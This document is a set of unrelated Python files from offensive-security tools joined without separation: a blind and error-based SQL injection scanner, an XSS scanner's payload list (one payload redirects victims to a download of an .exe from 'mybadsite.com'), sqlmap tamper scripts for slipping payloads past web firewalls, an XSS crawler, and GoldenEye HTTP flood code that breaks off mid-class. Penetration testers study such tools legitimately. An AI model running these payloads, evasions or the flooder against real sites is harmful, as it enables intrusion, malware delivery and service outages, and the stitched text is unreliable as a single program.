PREFIXES, SUFFIXES = (" ", ") ", "' ", "') "), ("", "-- -", "#", "%%16")            # prefix/suffix values used for building testing blind payloads
TAMPER_SQL_CHAR_POOL = ('(', ')', '\'', '"')                                        # characters used for SQL tampering/poisoning of parameter values
BOOLEAN_TESTS = ("AND %d=%d", "OR NOT (%d>%d)")                                     # boolean tests used for building testing blind payloads
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"                             # optional HTTP header names
GET, POST = "GET", "POST"                                                           # enumerator-like values used for marking current phase
TEXT, HTTPCODE, TITLE, HTML = range(4)                                             # enumerator-like values used for marking content type
FUZZY_THRESHOLD = 0.95                                                              # ratio value in range (0,1) used for distinguishing True from False responses
TIMEOUT = 30                                                                        # connection timeout in seconds
RANDINT = random.randint(1, 255)                                                    # random integer value used across all tests
BLOCKED_IP_REGEX = r"(?i)(\A|\b)IP\b.*\b(banned|blocked|bl(a|o)ck\s?list|firewall)" # regular expression used for recognition of generic firewall blocking messages

DBMS_ERRORS = {                                                                     # regular expressions used for DBMS recognition based on error message response
    "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
    "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
    "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
    "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
    "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
    "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
    "SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
    "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}

def _retrieve_content(url, data=None):
    retval = {HTTPCODE: http.client.OK}
    try:
        req = urllib.request.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in range(len(url))), data.encode("utf8", "ignore") if data else None, globals().get("_headers", {}))
        retval[HTML] = urllib.request.urlopen(req, timeout=TIMEOUT).read()
    except Exception as ex:
        retval[HTTPCODE] = getattr(ex, "code", None)
        retval[HTML] = ex.read() if hasattr(ex, "read") else str(ex.args[-1])
    retval[HTML] = (retval[HTML].decode("utf8", "ignore") if hasattr(retval[HTML], "decode") else "") or ""
    retval[HTML] = "" if re.search(BLOCKED_IP_REGEX, retval[HTML]) else retval[HTML]
    retval[HTML] = re.sub(r"(?i)[^>]*(AND|OR)[^<]*%d[^<]*" % RANDINT, "__REFLECTED__", retval[HTML])
    match = re.search(r"<title>(?P<result>[^<]+)</title>", retval[HTML], re.I)
    retval[TITLE] = match.group("result") if match and "result" in match.groupdict() else None
    retval[TEXT] = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+", " ", retval[HTML])
    return retval

def scan_page(url, data=None):
    retval, usable = False, False
    url, data = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url, re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
    try:
        for phase in (GET, POST):
            original, current = None, url if phase is GET else (data or "")
            for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", current):
                vulnerable, usable = False, True
                print("* scanning %s parameter '%s'" % (phase, match.group("parameter")))
                original = original or (_retrieve_content(current, data) if phase is GET else _retrieve_content(url, current))
                tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.parse.quote("".join(random.sample(TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL))))))
                content = _retrieve_content(tampered, data) if phase is GET else _retrieve_content(url, tampered)
                for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
                    if not vulnerable and re.search(regex, content[HTML], re.I) and not re.search(regex, original[HTML], re.I):
                        print(" (i) %s parameter '%s' appears to be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms))
                        retval = vulnerable = True
                vulnerable = False
                for prefix, boolean, suffix, inline_comment in itertools.product(PREFIXES, BOOLEAN_TESTS, SUFFIXES, (False, True)):
                    if not vulnerable:
                        template = ("%s%s%s" % (prefix, boolean, suffix)).replace(" " if inline_comment else "/**/", "/**/")
                        payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.parse.quote(template % (RANDINT if _ else RANDINT + 1, RANDINT), safe='%')))) for _ in (True, False))
                        contents = dict((_, _retrieve_content(payloads[_], data) if phase is GET else _retrieve_content(url, payloads[_])) for _ in (False, True))
                        if all(_[HTTPCODE] and _[HTTPCODE] < http.client.INTERNAL_SERVER_ERROR for _ in (original, contents[True], contents[False])):
                            if any(original[_] == contents[True][_] != contents[False][_] for _ in (HTTPCODE, TITLE)):
                                vulnerable = True
                            else:
                                ratios = dict((_, difflib.SequenceMatcher(None, original[TEXT], contents[_][TEXT]).quick_ratio()) for _ in (False, True))
                                vulnerable = all(ratios.values()) and min(ratios.values()) < FUZZY_THRESHOLD < max(ratios.values()) and abs(ratios[True] - ratios[False]) > FUZZY_THRESHOLD / 10
                        if vulnerable:
                            print(" (i) %s parameter '%s' appears to be blind SQLi vulnerable (e.g.: '%s')" % (phase, match.group("parameter"), payloads[True]))
                            retval = True
        if not usable:
            print(" (x) no usable GET/POST parameters found")
    except KeyboardInterrupt:
        print("\r (x) Ctrl-C pressed")
    return retval

def init_options(proxy=None, cookie=None, ua=None, referer=None):
    globals()["_headers"] = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer))))
    urllib.request.install_opener(urllib.request.build_opener(urllib.request.ProxyHandler({'http': proxy})) if proxy else None)

if __name__ == "__main__":
    print("%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR))
    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.target.com/page.php?id=1\")")
    parser.add_option("--data", dest="data", help="POST data (e.g. \"query=test\")")
    parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
    parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
    parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
    parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. \"http://127.0.0.1:8080\")")
    options, _ = parser.parse_args()
    if options.url:
        init_options(options.proxy, options.cookie, options.ua, options.referer)
        result = scan_page(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
        print("\nscan results: %s vulnerabilities found" % ("possible" if result else "no"))
    else:
        parser.print_help()


import os
import re
import sys
import platform
import importlib


VERSION = "0.4"
HEADERS = {
    "Connection": "close",
    "User-Agent": "xanxss/v{} (Language={}; Platform={})".format(
        VERSION, sys.version.split(" ")[0], platform.platform().split(" ")[0]
    ),
}
PAYLOADS = [
    "<script src='http://xss.rocks/xss.js'></script>",
    "<img src='javascript:alert(\"XSS\");'>",
    "<script>alert(1);</script>",
    (
        "<b onmouseover=window.location='https://mybadsite.com/download.php?item=pumpedupkicks.exe'>click"
        " me!</b>"
    ),
    '<iframe src="javascript:prompt(1)">',
    "<xanxss></xanxss>",
]


def load_tampers():
    """Load the tamper scripts into memory."""
    script_path = "{}/panthon/XSS/XanXSS/tamper".format(os.getcwd())
    # script_path="/Users/arunimakumar/Projects/panthon/panthon/XSS/XanXSS/tamper"
    importter = "tamper.{}"
    skip_schema = ("__init__.py", ".pyc", "__")
    tmp = []
    retval = []
    file_list = [
        f for f in os.listdir(script_path) if not any(s in f for s in skip_schema)
    ]
    for script in file_list:
        script = script[:-3]
        script = importlib.import_module(importter.format(script))
        tmp.append(script)
    for mod in tmp:
        current_priority = mod.__PRIORITY__
        if current_priority > 10:
            save = mod
        else:
            save = None
            retval.insert(current_priority, mod)
        retval.insert(-1, save)
    return retval


def prettify(working):
    """Make output beautiful."""
    seperator = "-" * 50
    print(seperator)
    for item in working:
        print("  ~~> {}".format(item))
    print(seperator)


def heuristics(url):
    query_regex = re.compile(r"(.*)[?|#](.*){1}\=(.*)")
    url_validation = re.compile(
        r"^(?:http|ftp)s?://"  # http:// or https://
        r"(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|"  # domain...
        r"localhost|"  # localhost...
        r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"  # ...or ip
        r"(?::\d+)?"  # optional port
        r"(?:/?|[/?]\S+)$",
        re.IGNORECASE,
    )
    retval = {}
    if url_validation.match(url):
        retval["validated"] = True
    else:
        retval["validated"] = False
    if query_regex.search(url) is not None:
        retval["query"] = "ok"
    else:
        retval["query"] = "nogo"
    for c in url:
        if c == "*":
            retval["marker"] = "yes"
    if url.count("*") > 1:
        retval["multi_marker"] = True
    return retval



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Abuses MySQL scientific notation.

    Requirement:
        * MySQL

    Notes:
        * Reference: https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/

    >>> tamper('1 AND ORD(MID((CURRENT_USER()),7,1))>1')
    '1 AND ORD 1.e(MID((CURRENT_USER 1.e( 1.e) 1.e) 1.e,7 1.e,1 1.e) 1.e)>1'
    """

    if payload:
        payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload)
        payload = re.sub(
            r"(\w+)\(",
            lambda match: (
                "%s 1.e(" % match.group(1)
                if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1))
                else match.group(0)
            ),
            payload,
        )  # NOTE: MID and CAST don't work for sure

    return payload



from lib.cmd import OptParser
from lib.requester import Requester
from lib.payload_generation import PayloadGeneration
from lib.polyglot_generator import generate_polyglot
from lib.settings import PAYLOADS, prettify, HEADERS, heuristics
from lib.formatter import info, debug, warning, error


def main():
    placement_marker = False

    try:
        opts = OptParser.opts()
        retval = []
        if opts.urlToUse is None:
            error("must provide a URL to test")
            exit(1)
        else:
            url_validation = heuristics(opts.urlToUse)
            if not url_validation["validated"]:
                error(
                    "the provided URL could not be validated as a URL, check the URL"
                    " and try again. a valid URL looks something like this:"
                    " 'http://somesite.com/some/path.php?someid=param'"
                )
                exit(1)
            else:
                if url_validation["query"] == "nogo":
                    warning(
                        "heuristic testing has detected that the provided URL lacks a"
                        " GET parameter this may interfere with testing results"
                    )
            try:
                if url_validation["marker"] == "yes":
                    info("marker for attack placement found, prioritizing")
                    placement_marker = True
                if url_validation["multi_marker"]:
                    warning(
                        "multiple markers are not supported, only the first one will be"
                        " used"
                    )
            except:
                pass
        if opts.extraHeaders is not None:
            info("using extra headers")
            headers = opts.extraHeaders
        else:
            headers = HEADERS
        if opts.amountToFind is not None:
            amount_of_payloads = opts.amountToFind
        else:
            amount_of_payloads = 25
        if opts.verificationAmount is not None:
            verification_amount = opts.verificationAmount
        else:
            verification_amount = 5
        if opts.providedPayloads is not None:
            info("using provided payloads")
            payloads = []
            for payload in opts.providedPayloads:
                payloads.append(payload)
        elif opts.payloadFile is not None:
            info("using payloads from a file")
            payloads = []
            with open(opts.payloadFile) as f:
                for payload in f.readlines():
                    payloads.append(payload.strip())
        else:
            info("using default payloads")
            payloads = PAYLOADS
        if len(payloads) < 5:
            error("must provide at least 5 payloads")
            exit(1)
        if opts.testTime is not None:
            test_time = opts.testTime
        else:
            test_time = 10
        info("generating payloads")
        generator = PayloadGeneration(payloads, amount_of_payloads)
        info("running payloads through tampering procedures")
        tampers = generator.create_tampers()
        info("payloads tampered successfully")
        payloads = generator.obfuscate_tampers(tampers)
        if opts.genPolyglot:
            info("generating polyglot script")
            polyglot = generate_polyglot()
            info("script generated: {}".format(polyglot))
        info("running payloads")
        times_ran = 0
        for payload in payloads:
            if opts.genPolyglot and times_ran != 1:
                warning("running polyglot first")
                times_ran += 1
                payload = polyglot
            if opts.runVerbose:
                debug(
                    "running payload '{}{}{}'".format(
                        opts.usePrefix, payload, opts.useSuffix
                    )
                )
            requester = Requester(
                opts.urlToUse,
                payload,
                headers=headers,
                proxy=opts.proxyToUse,
                throttle=opts.throttleTime,
            )
            soup = requester.make_request(
                marker=placement_marker, prefix=opts.usePrefix, suffix=opts.useSuffix
            )
            retval.append(soup)
        info("running checks")
        working_payloads = Requester.check_for_script(
            retval, verification_amount=verification_amount, test_time=test_time
        )
        if opts.useSuffix != "" or opts.usePrefix != "":
            working_payloads = [
                opts.usePrefix + p + opts.useSuffix for p in working_payloads
            ]
        if len(working_payloads) == 0:
            warning("no working payloads found for requested site")
            info("checking if scripts are being sanitized")
            requester = Requester(
                opts.urlToUse,
                None,
                headers=headers,
                proxy=opts.proxyToUse,
                throttle=opts.throttleTime,
            )
            results = requester.check_for_sanitize()
            if results:
                warning("it seems that the scripts are being sanitized properly")
            elif results is None:
                warning("hit an error in request, possible WAF?")
            else:
                info(
                    "it appears that the scripts are not being sanitized, try manually?"
                )
            exit(1)
        else:
            info("working payloads:")
            prettify(working_payloads)
            info("found a total of {} working payloads".format(len(working_payloads)))
    except Exception as e:
        import sys
        import traceback

        error(
            "something bad happened, failed with error: {}, traceback:".format(str(e))
        )
        print(
            "Traceback (most recent call):\n    {}".format(
                "".join(traceback.format_tb(sys.exc_info()[2])).strip()
            )
        )
    except KeyboardInterrupt:
        error("user quit")



import unittest
from panthon import ddos_attack


class TestDoSAttack(unittest.TestCase):
    def test_simulation(self):
        # Instantiate the class
        ddos = ddos_attack.DDoSAttack("dummy_target")

        # Test the simulate method
        # You'll need to determine how to test this based on your implementation.
        # This could involve checking the state of `dummy_target` before and after the simulation.
        ddos.simulate()



"""
XSSCon - 2019/2020
This project was created by menkrep1337 with 407Aex team.
Copyright under the MIT license
"""

import argparse
from lib.helper.helper import *
from lib.helper.Log import *
from lib.core import *
from random import randint
from lib.crawler.crawler import *

epilog = """
Github: https://www.github.com/menkrep1337/XSSCon
Version: 0.5 Final
"""


def check(getopt):
    payload = int(getopt.payload_level)
    if payload > 6 and getopt.payload is None:
        Log.info("Do you want use custom payload (Y/n)?")
        answer = input("> " + W)
        if answer.lower().strip() == "y":
            Log.info("Write the XSS payload below")
            payload = input("> " + W)
        else:
            payload = core.generate(randint(1, 6))

    else:
        payload = core.generate(payload)

    return payload if getopt.payload is None else getopt.payload


def start():
    parse = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        usage="XSSCon -u <target> [options]",
        epilog=epilog,
        add_help=False,
    )

    pos_opt = parse.add_argument_group("Options")
    pos_opt.add_argument(
        "--help",
        action="store_true",
        default=False,
        help="Show usage and help parameters",
    )
    pos_opt.add_argument(
        "-u", metavar="", help="Target url (e.g. http://testphp.vulnweb.com)"
    )
    pos_opt.add_argument(
        "--depth", metavar="", help="Depth web page to crawl. Default: 2", default=2
    )
    pos_opt.add_argument(
        "--payload-level",
        metavar="",
        help="Level for payload Generator, 7 for custom payload. {1...6}. Default: 6",
        default=6,
    )
    pos_opt.add_argument(
        "--payload",
        metavar="",
        help="Load custom payload directly (e.g. <script>alert(2005)</script>)",
        default=None,
    )
    pos_opt.add_argument(
        "--method",
        metavar="",
        help="Method setting(s): \n\t0: GET\n\t1: POST\n\t2: GET and POST (default)",
        default=2,
        type=int,
    )
    pos_opt.add_argument(
        "--user-agent",
        metavar="",
        help="Request user agent (e.g. Chrome/2.1.1/...)",
        default=agent,
    )
    pos_opt.add_argument(
        "--single",
        action="store_true",
        help="Single scan. No crawling just one address",
    )
    pos_opt.add_argument(
        "--proxy",
        default=None,
        metavar="",
        help="Set proxy (e.g. {'https':'https://10.10.1.10:1080'})",
    )
    pos_opt.add_argument(
        "--about", action="store_true", help="Print information about XSSCon tool"
    )
    pos_opt.add_argument(
        "--cookie",
        help="Set cookie (e.g {'ID':'1094200543'})",
        default="""{"ID":"1094200543"}""",
        metavar="",
    )

    getopt = parse.parse_args()
    print(logo)
    Log.info("Starting XSSCon...")

    if getopt.u:
        if getopt.single:
            core.main(
                getopt.u,
                getopt.proxy,
                getopt.user_agent,
                check(getopt),
                getopt.cookie,
                getopt.method,
            )
        else:
            core.main(
                getopt.u,
                getopt.proxy,
                getopt.user_agent,
                check(getopt),
                getopt.cookie,
                getopt.method,
            )
            crawler.crawl(
                getopt.u,
                int(getopt.depth),
                getopt.proxy,
                getopt.user_agent,
                check(getopt),
                getopt.method,
                getopt.cookie,
            )

    elif getopt.about:
        print(
            """
***************
Project: XSSCon
License: MIT
Author: menkrep1337
Last updates: 2019 may 26
Note: Take your own RISK
****************
"""
            + epilog
        )
    else:
        parse.print_help()


if __name__ == "__main__":
    start()



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.convert import getOrds
from plugins.generic.syntax import Syntax as GenericSyntax


class Syntax(GenericSyntax):
    @staticmethod
    def escape(expression, quote=True):
        """
        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar"
        True
        >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+NCHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar"
        True
        """

        def escaper(value):
            return "+".join(
                "%s(%d)" % ("CHAR" if _ < 128 else "NCHAR", _) for _ in getOrds(value)
            )

        return Syntax._escape(expression, quote, escaper)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.enums import DBMS
from lib.core.settings import ORACLE_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.oracle.enumeration import Enumeration
from plugins.dbms.oracle.filesystem import Filesystem
from plugins.dbms.oracle.fingerprint import Fingerprint
from plugins.dbms.oracle.syntax import Syntax
from plugins.dbms.oracle.takeover import Takeover
from plugins.generic.misc import Miscellaneous


class OracleMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
    """This class defines Oracle methods."""

    def __init__(self):
        self.excludeDbsList = ORACLE_SYSTEM_DBS

        for cls in self.__class__.__bases__:
            cls.__init__(self)

    unescaper[DBMS.ORACLE] = Syntax.escape



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import cProfile
import os

from lib.core.data import logger
from lib.core.data import paths


def profile(profileOutputFile=None):
    """This will run the program and present profiling data in a nice looking
    graph."""

    if profileOutputFile is None:
        profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw")

    if os.path.exists(profileOutputFile):
        os.remove(profileOutputFile)

    # Start sqlmap main function and generate a raw profile file
    cProfile.run("start()", profileOutputFile)

    infoMsg = (
        "execution profiled and stored into file '%s' (e.g. 'gprof2dot -f pstats %s |"
        " dot -Tpng -o /tmp/sqlmap_profile.png')"
        % (profileOutputFile, profileOutputFile)
    )
    logger.info(infoMsg)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import string

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Converts all (non-alphanum) characters in a given payload to overlong
    UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)

    Reference:
        * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
        * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/

    >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
    'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'
    """

    retVal = payload

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if (
                payload[i] == "%"
                and (i < len(payload) - 2)
                and payload[i + 1 : i + 2] in string.hexdigits
                and payload[i + 2 : i + 3] in string.hexdigits
            ):
                retVal += payload[i : i + 3]
                i += 3
            else:
                if payload[i] not in (string.ascii_letters + string.digits):
                    retVal += "%%%.2X%%%.2X" % (
                        0xC0 + (ord(payload[i]) >> 6),
                        0x80 + (ord(payload[i]) & 0x3F),
                    )
                else:
                    retVal += payload[i]
                i += 1

    return retVal



import random
import requests
import time
from urllib3.exceptions import ProtocolError
import warnings

import core.config
from core.utils import converter, getVar
from core.log import setup_logger

logger = setup_logger(__name__)

warnings.filterwarnings("ignore")  # Disable SSL related warnings


def requester(url, data, headers, GET, delay, timeout):
    if getVar("jsonData"):
        data = converter(data)
    elif getVar("path"):
        url = converter(data, url)
        data = []
        GET, POST = True, False
    time.sleep(delay)
    user_agents = [
        "Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0",
        (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like"
            " Gecko) Chrome/60.0.3112.113 Safari/537.36"
        ),
        (
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like"
            " Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991"
        ),
    ]
    if "User-Agent" not in headers:
        headers["User-Agent"] = random.choice(user_agents)
    elif headers["User-Agent"] == "$":
        headers["User-Agent"] = random.choice(user_agents)
    logger.debug("Requester url: {}".format(url))
    logger.debug("Requester GET: {}".format(GET))
    logger.debug_json("Requester data:", data)
    logger.debug_json("Requester headers:", headers)
    try:
        if GET:
            response = requests.get(
                url,
                params=data,
                headers=headers,
                timeout=timeout,
                verify=False,
                proxies=core.config.proxies,
            )
        elif getVar("jsonData"):
            response = requests.post(
                url,
                json=data,
                headers=headers,
                timeout=timeout,
                verify=False,
                proxies=core.config.proxies,
            )
        else:
            response = requests.post(
                url,
                data=data,
                headers=headers,
                timeout=timeout,
                verify=False,
                proxies=core.config.proxies,
            )
        return response
    except ProtocolError:
        logger.warning("WAF is dropping suspicious requests.")
        logger.warning("Scanning will continue after 10 minutes.")
        time.sleep(600)
    except Exception:
        logger.warning("Unable to connect to the target.")
        return requests.Response()



from multiprocessing import Process, Manager
import urllib.parse, ssl
import sys
import getopt
import random
import http.client

HTTPCLIENT = http.client

####
# Config
####
DEBUG = False
SSLVERIFY = True

####
# Constants
####
METHOD_GET = "get"
METHOD_POST = "post"
METHOD_RAND = "random"

JOIN_TIMEOUT = 1.0

DEFAULT_WORKERS = 10
DEFAULT_SOCKETS = 500

USER_AGENT_PARTS = {
    "os": {
        "linux": {"name": ["Linux x86_64", "Linux i386"], "ext": ["X11"]},
        "windows": {
            "name": [
                "Windows NT 6.1",
                "Windows NT 6.3",
                "Windows NT 5.1",
                "Windows NT.6.2",
            ],
            "ext": ["WOW64", "Win64; x64"],
        },
        "mac": {
            "name": ["Macintosh"],
            "ext": [
                "Intel Mac OS X %d_%d_%d"
                % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5))
                for i in range(1, 10)
            ],
        },
    },
    "platform": {
        "webkit": {
            "name": [
                "AppleWebKit/%d.%d" % (random.randint(535, 537), random.randint(1, 36))
                for i in range(1, 30)
            ],
            "details": ["KHTML, like Gecko"],
            "extensions": [
                "Chrome/%d.0.%d.%d Safari/%d.%d"
                % (
                    random.randint(6, 32),
                    random.randint(100, 2000),
                    random.randint(0, 100),
                    random.randint(535, 537),
                    random.randint(1, 36),
                )
                for i in range(1, 30)
            ]
            + [
                "Version/%d.%d.%d Safari/%d.%d"
                % (
                    random.randint(4, 6),
                    random.randint(0, 1),
                    random.randint(0, 9),
                    random.randint(535, 537),
                    random.randint(1, 36),
                )
                for i in range(1, 10)
            ],
        },
        "iexplorer": {
            "browser_info": {
                "name": [
                    "MSIE 6.0",
                    "MSIE 6.1",
                    "MSIE 7.0",
                    "MSIE 7.0b",
                    "MSIE 8.0",
                    "MSIE 9.0",
                    "MSIE 10.0",
                ],
                "ext_pre": ["compatible", "Windows; U"],
                "ext_post": ["Trident/%d.0" % i for i in range(4, 6)]
                + [
                    ".NET CLR %d.%d.%d"
                    % (
                        random.randint(1, 3),
                        random.randint(0, 5),
                        random.randint(1000, 30000),
                    )
                    for i in range(1, 10)
                ],
            }
        },
        "gecko": {
            "name": [
                "Gecko/%d%02d%02d Firefox/%d.0"
                % (
                    random.randint(2001, 2010),
                    random.randint(1, 31),
                    random.randint(1, 12),
                    random.randint(10, 25),
                )
                for i in range(1, 30)
            ],
            "details": [],
            "extensions": [],
        },
    },
}

####
# GoldenEye Class
####


class GoldenEye(object):
    # Counters
    counter = [0, 0]
    last_counter = [0, 0]

    # Containers
    workersQueue = []
    manager = None
    useragents = []

    # Properties
    url = None

    # Options
    nr_workers = DEFAULT_WORKERS
    nr_sockets = DEFAULT_SOCKETS
    method = METHOD_GET

    def __init__(self, url):
        # Set URL
        self.url = url

        # Initialize Manager
        self.manager = Manager()

        # Initialize Counters
        self.counter = self.manager.list((0, 0))

    def exit(self):
        self.stats()
        print("Shutting down GoldenEye")

    def __del__(self):
        self.exit()

    def printHeader(self):
        # Taunt!
        print()
        print()

    # Do the fun!
    def fire(self):
        self.printHeader()
        print(
            "Hitting webserver in mode '{0}' with {1} workers running {2} connections"
            " each. Hit CTRL+C to cancel.".format(
                self.method, self.nr_workers, self.nr_sockets
            )
        )

        if DEBUG:
            print("Starting {0} concurrent workers".format(self.nr_workers))

        # Start workers
        for i in range(int(self.nr_workers)):
            try:
                worker = Striker(self.url, self.nr_sockets, self.counter)
                worker.useragents = self.useragents
                worker.method = self.method

                self.workersQueue.append(worker)
                worker.start()
            except Exception:
                error("Failed to start worker {0}".format(i))

        if DEBUG:
            print("Initiating monitor")
        self.monitor()

    def stats(self):
        try:
            if self.counter[0] > 0 or self.counter[1] > 0:
                print(
                    "{0} GoldenEye strikes hit. ({1} Failed)".format(
                        self.counter[0], self.counter[1]
                    )
                )

                if (
                    self.counter[0] > 0
                    and self.counter[1] > 0
                    and self.last_counter[0] == self.counter[0]
                    and self.counter[1] > self.last_counter[1]
                ):
                    print("\tServer may be DOWN!")

                self.last_counter[0] = self.counter[0]
                self.last_counter[1] = self.counter[1]
        except Exception:
            pass  # silently ignore

    def monitor(self):
        while len(self.workersQueue) > 0:
            try:
                for worker in self.workersQueue:
                    if worker is not None and worker.is_alive():
                        worker.join(JOIN_TIMEOUT)
                    else:
                        self.workersQueue.remove(worker)

                self.stats()

            except (KeyboardInterrupt, SystemExit):
                print("CTRL+C received. Killing all workers")
                for worker in self.workersQueue:
                    try:
                        if DEBUG:
                            print("Killing worker {0}".format(worker.name))
                        # worker.terminate()
                        worker.stop()
                    except Exception:
                        pass  # silently ignore
                if DEBUG:
                    raise
                else:
                    pass


####
# Striker Class
####


class Striker(Process):
    # Counters
    request_count = 0
    failed_count = 0

    # Containers
    url = None
    host = None
    port = 80
    ssl = False
    referers = []
    useragents = []
    socks = []
    counter = None
    nr_socks = DEFAULT_SOCKETS

    # Flags
    runnable = True

    # Options
    method = METHOD_GET

    def __init__(self, url, nr_sockets, counter):
        super(Striker, self).__init__()

        self.counter = counter
        self.nr_socks = nr_sockets

        parsedUrl = urllib.parse.urlparse(url)

        if parsedUrl.scheme == "https":
            self.ssl = True

        self.host = parsedUrl.netloc.split(":")[0]
        self.url = parsedUrl.path

        self.port = parsedUrl.port

        if not self.port:
            self.port = 80 if not self.ssl else 443

        self.referers = [
            "http://www.google.com/",
            "http://www.bing.com/",
            "http://www.baidu.com/",
            "http://www.yandex.com/",
            "http://" + self.host + "/",
        ]

    def __del__(self):
        self.stop()

    # builds random ascii string
    def buildblock(self, size):
        out_str = ""

        _LOWERCASE = list(range(97, 122))
        _UPPERCASE = list(range(65, 90))
        _NUMERIC = list(range(48, 57))

        validChars = _LOWERCASE + _UPPERCASE + _NUMERIC

        for i in range(0, size):
            a = random.choice(validChars)
            out_str += chr(a)

        return out_str

    def run(self):
        if DEBUG:
            print("Starting worker {0}".format(self.name))

        while self.runnable:
            try:
                for i in range(self.nr_socks):
                    if self.ssl:
                        if SSLVERIFY:
                            c = HTTPCLIENT.HTTPSConnection(self.host, self.port)
                        else:
                            c = HTTPCLIENT.HTTPSConnection(
                                self.host,
                                self.port,
                                context=ssl._create_unverified_context(),
                            )
                    else:
                        c = HTTPCLIENT.HTTPConnection(self.host, self.port)

                    self.socks.append(c)

                for conn_req in self.socks:
                    (url, headers) = self.createPayload()

                    method = (
                        random.choice([METHOD_GET, METHOD_POST])
                        if self.method == METHOD_RAND
                        else self.method
                    )

                    conn_req.request(method.upper(), url, None, headers)

                for conn_resp in self.socks:
                    conn_resp.getresponse()
                    self.incCounter()

                self.closeConnections()

            except:
                self.incFailed()
                if DEBUG:
                    raise
                else:
                    pass  # silently ignore

        if DEBUG:
            print("Worker {0} completed run. Sleeping...".format(self.name))

    def closeConnections(self):
